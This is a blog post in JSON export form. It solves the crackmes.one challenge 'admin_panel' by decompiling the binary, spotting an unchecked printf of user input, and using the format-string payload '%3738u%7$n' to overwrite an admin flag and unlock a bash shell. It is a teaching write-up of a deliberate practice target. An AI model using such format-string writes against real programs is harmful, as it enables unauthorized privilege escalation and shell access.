{"id":11238,"date":"2021-05-18T10:16:18","date_gmt":"2021-05-18T10:16:18","guid":{"rendered":"http:\/\/www.max-sperling.bplaced.net\/?p=11238"},"modified":"2024-02-16T10:16:11","modified_gmt":"2024-02-16T10:16:11","slug":"crackmes-one-example-3","status":"publish","type":"post","link":"http:\/\/www.max-sperling.bplaced.net\/?p=11238","title":{"rendered":"crackmes.one (Example 3)"},"content":{"rendered":"<p><strong>Setup<\/strong><\/p>\n<p><u>Data<\/u><\/p>\n<ul>\n<li>URL: <a href=\"https:\/\/crackmes.one\/crackme\/5e74a49833c5d4439bb2def5\">BitFriends&#8217;s admin_panel<\/a><\/li>\n<li>Language: C\/C++<\/li>\n<li>Platform: Unix\/Linux (ELF64)<\/li>\n<li>Description: &#8220;Welcome to my little crackme! Your goal is to get a shell!<br \/>\nAs usual patching is not allowed. ld_preload, dll injection and rootkits are not allowed too. I hope the crackme is not overrated or underated. Have fun!&#8221;<\/li>\n<\/ul>\n<p><u>Output<\/u><\/p>\n<pre>\r\n$ .\/admin_panel \r\nWelcome to the admin panel! The program which admins can\r\ninteract with on a guest computer to do admin stuff!\r\n\r\nstatus: (admin=false; shell=unavailable)\r\n\r\n*> \r\n<\/pre>\n<hr>\n<p><strong>Analysis<\/strong><\/p>\n<p><u>Tools<\/u><br \/>\nCutter\/Radare2<\/p>\n<p><u>Decompiler<\/u> (Commented)<\/p>\n<pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\r\nundefined8 main(void)\r\n{\r\n    int32_t iVar1;\r\n    int64_t iVar2;\r\n    undefined8 uVar3;\r\n    int64_t in_FS_OFFSET;\r\n    char *src;\r\n    char *dest;\r\n    char *format;\r\n    int64_t canary;\r\n    \r\n    canary = *(int64_t *)(in_FS_OFFSET + 0x28);\r\n    strcpy(&amp;dest, admin, admin);\r\n    puts(\r\n        &quot;Welcome to the admin panel! 
The program which admins can\\ninteract with on a guest computer to do admin stuff!\\n&quot;\r\n        );\r\n    while( true ) {\r\n        if (_admin != 0xe9a) {\r\n            puts(&quot;status: (admin=false; shell=unavailable)\\n&quot;);\r\n        }\r\n        if (_admin == 0xe9a) {\r\n            puts(&quot;status: (admin=true; shell=available)\\n&quot;);\r\n        }\r\n        printf(0x20cf); \/\/ 0x20cf:&quot;*&gt; &quot;\r\n        iVar2 = fgets(&amp;format, 0x100, _reloc.stdin);\r\n        if (iVar2 == 0) break;\r\n        strtok(&amp;format, 0x20d3); \/\/ 0x20d3:&quot;\\n&quot;; Removes &quot;\\n&quot; from &amp;format\r\n        iVar1 = strcmp(&amp;format, 0x20d5); \/\/ 0x20d5:&quot;shell&quot;\r\n        if ((iVar1 == 0) &amp;&amp; (_admin == 0xe9a)) {\r\n            system(&quot;\/bin\/bash&quot;);\r\n        } else {\r\n            printf(&quot;input: &quot;);\r\n            printf(&amp;format);\r\n            puts(0x20d3);\r\n        }\r\n    }\r\n    uVar3 = 0;\r\n    if (canary != *(int64_t *)(in_FS_OFFSET + 0x28)) {\r\n        uVar3 = __stack_chk_fail();\r\n    }\r\n    return uVar3;\r\n}\r\n<\/pre>\n<p><u>Conclusion<\/u><br \/>\nThe value of iVar1 has to be 0 and the value of admin (bss segment addr: 0x407c) has to be 0xe9a. To get iVar1 to 0 we have to enter &#8220;shell\\n&#8221;. To get admin to 0xe9a we have to find a vulnerability to write that value. 
The app prints out what we have entered so we can possibly use a format string attack.<\/p>\n<p>Attached gdb to the running admin_panel process to resolve the address.<\/p>\n<pre>\r\n$ pidof admin_panel\r\n3915\r\n$ sudo gdb ~\/Downloads\/admin_panel\r\n(gdb) attach 3915\r\n(gdb) p &admin\r\n$1 = (<data variable, no debug info> *) 0x559045ffb07c <admin>\r\n<\/pre>\n<p>That address (&#038;admin) changes with every new startup.<\/p>\n<p>Let&#8217;s find out if that address is currently stored on the stack.<\/p>\n<pre>\r\n*> %x %x %x %x %x %x %x %x\r\ninput: 45ff90ec aff3c780 7 b014d700 7 2e5f26f2 45ffb07c b014d700\r\n<\/pre>\n<p>Indeed it is at position 7.<\/p>\n<hr>\n<p><strong>Solution<\/strong><\/p>\n<p><u>Format string<\/u><br \/>\nLet&#8217;s overwrite the value (to 0xe9a) to which the 7th parameter is pointing.<\/p>\n<p>1. Let&#8217;s print out the 7th parameter<\/p>\n<pre>\r\n*> %7$x\r\ninput: 45ffb07c\r\n<\/pre>\n<p>2. Let&#8217;s write a number to the 7th param<\/p>\n<pre>\r\n*>     %7$n\r\ninput:     \r\n<\/pre>\n<pre>\r\n(gdb) x\/x &admin\r\n0x559045ffb07c <admin>:\t0x00000004\r\n<\/pre>\n<p>The value 4 has been written to admin, because 4 characters (here: spaces) were entered before %7$n.<\/p>\n<p>3. Let&#8217;s write 0xe9a to the 7th param<\/p>\n<pre>\r\n*> %3738u%7$n\r\n\r\nstatus: (admin=true; shell=available)\r\n<\/pre>\n<p>0xe9a is 3738 in decimal. Also valid: <\/p>\n<pre>\"%3737u %7$n\", \"%3736u  %7$n\", \"%3735u   %7$n\", ...<\/pre>\n<pre>\r\n(gdb) x\/x &admin\r\n0x559045ffb07c <admin>:\t0x00000e9a\r\n<\/pre>\n<p>For more information: <a href=\"https:\/\/braddaniels.org\/format-string-vulns\/\">Brad Daniels Blog<\/a><\/p>\n<p><u>Output<\/u><\/p>\n<pre>\r\n*> %3738u%7$n\r\n\r\nstatus: (admin=true; shell=available)\r\n\r\n*> shell\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Setup Data URL: BitFriends&#8217;s admin_panel Language: C\/C++ Platform: Unix\/Linux (ELF64) Description: &#8220;Welcome to my little crackme! 
Your goal is to<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[39],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/11238"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11238"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/11238\/revisions"}],"predecessor-version":[{"id":16710,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/11238\/revisions\/16710"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11238"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}